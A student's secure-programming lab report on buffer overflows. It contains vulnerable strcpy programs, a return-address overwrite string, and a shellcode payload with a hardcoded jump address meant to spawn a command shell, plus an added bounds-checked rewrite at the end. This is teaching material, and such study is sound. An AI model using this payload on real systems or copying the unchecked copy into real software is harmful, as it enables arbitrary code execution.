Secure Programming Lab Report.doc
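Lab Report

Course name:    College:    Name:    Class:    Student ID:    Date (year/month/day):

Experiment 1: Buffer overflow security issues

I: What is a buffer overflow

A buffer overflow occurs when a computer writes more data into a buffer than the buffer can hold, so that the data spills over. In some cases the overflowing data only overwrites unimportant memory and has no serious consequences; but once it overwrites legitimate data, it can cause great harm to the system.

Lab programs: run and debug the buffer overflow programs P02_03.C, P02_04.C, P02_05.C, P02_06.C

II: Procedure

1: Open Microsoft Visual Studio 6.0 and select Microsoft Visual C++. File - New - Projects - Win32 Console Application (project name P0203). File - New - Files - C++ Source File. Edit the program:

    #include <stdio.h>
    #include <string.h>

    void function(char *input)
    {
        char buffer[10];
        /* strcpy does no bounds check: input longer than 9 characters overflows buffer */
        strcpy(buffer, input);
        printf("Call fun1, buffer=%s\n", buffer);
    }

    int main(int argc, char *argv[])
    {
        function(argv[1]);
        return 0;
    }

Build - Compile p0203.cpp, then Build - Build p02.exe. Locate the project's output, for example D:\p02.exe

2: Start - Run - cmd. Enter D: (switch to drive D), then enter CD P02\Debug (change to the folder containing the generated exe).

Entering "P02 security" displays:

Entering "p02 abcdefghijklmnopqrstuvwxyz1234567890" pops up an application error dialog, with the message:

3: Change the code to:

    #include <stdio.h>
    #include <string.h>

    void fun1(char *input)
    {
        char buffer[10];
        /* strcpy does no bounds check: input longer than 9 characters overflows buffer */
        strcpy(buffer, input);
        printf("Call fun1, buffer=%s\n", buffer);
    }

    void fun2()
    {
        printf("call fun2");
    }

    int main(int argc, char *argv[])
    {
        printf("Address of fun2=%p\n", fun2);
        fun1(argv[1]);
        return 0;
    }

Entering "p02 abcde" displays:

Entering "p02 abcdefghijklmnopqrstuvwxyz1234567890" pops up an application error dialog, with the message:

4: Change the code to:

    #include <stdio.h>
    #include <string.h>

    void fun1(char *input)
    {
        char buffer[10];
        strcpy(buffer, input);
        printf("Call fun1, buffer=%s\n", buffer);
    }

    void fun2()
    {
        printf("call fun2");
    }

    int main(int argc, char *argv[])
    {
        printf("Address of fun2=%p\n", fun2);
        fun1("abcdefghijklmnopqrstuvwxyz12\x05\x10\x40");
        return 0;
    }

Running the program directly, it could not call fun2 as the book describes, because the entry point of the next buffer area could not be found.

5: The universal jump-instruction address is 0x7ffa4512.

    #include <stdio.h>
    #include <string.h>

    void fun1(char *input)
    {
        char buffer[10];
        strcpy(buffer, input);
        printf("Call fun1, buffer=%s\n", buffer);
    }

    int main(int argc, char *argv[])
    {
        char buffer[] = "abcdefghijklmnopqrstuvwxzy12\x12\x45\xfa\x7f"
            "\x55\x8B\xEC\x33\xC0\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
            "\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"
            "\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA"
            "\x77\x1d\x80\x7c"
            "\x52\x8D\x45\xF4\x50\xFF\x55\xF0"
            "\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E"
            "\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4"
            "\x50\xB8"
            "\xc7\x93\xbf\x77"
            "\xFF\xD0"
            "\x83\xC4\x12\x5D";
        fun1(buffer);
        return 0;
    }

Running the program did not bring up a console command window as the book describes, because of the operating system installed in the lab. In theory it should work.

Experiment 2: Integer overflow issues

1: 2: 3: 4: 5: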
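For Experiment 1, a bounds-checked counterpart of fun1 that rejects oversized input instead of overflowing buffer[10]. This is an added example, not code from the report or the textbook; the names copy_checked, fun1_checked and BUF_SIZE are assumptions made here.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 10  /* assumption: same size as buffer[10] in the report's fun1 */

/* Copy src into dst only if it fits, terminator included.
 * Returns the string length on success, -1 if src is NULL or too long.
 * On failure dst is left as an empty string, never partially filled. */
int copy_checked(char *dst, size_t dstsz, const char *src)
{
    size_t n = 0;
    if (dst == NULL || dstsz == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL)
        return -1;
    /* Scan at most dstsz bytes, so the check itself is bounded. */
    while (n < dstsz && src[n] != '\0')
        n++;
    if (n == dstsz)              /* no room left for the '\0' */
        return -1;
    memcpy(dst, src, n + 1);     /* n + 1 <= dstsz, includes the '\0' */
    return (int)n;
}

/* Hardened fun1: refuses input that strcpy would write past the buffer. */
int fun1_checked(const char *input)
{
    char buffer[BUF_SIZE];
    int len = copy_checked(buffer, sizeof buffer, input);
    if (len < 0) {
        fprintf(stderr, "fun1: input rejected (max %d chars)\n", BUF_SIZE - 1);
        return -1;
    }
    printf("Call fun1, buffer=%s\n", buffer);
    return len;
}

int main(int argc, char *argv[])
{
    if (argc != 2) {             /* the lab programs read argv[1] unchecked */
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 2;
    }
    return fun1_checked(argv[1]) < 0 ? 1 : 0;
}
```

With the lab's inputs, "security" and "abcde" are printed as before, while the 36-character string is rejected; the boundary is 9 characters, because the tenth byte of the buffer holds the terminator.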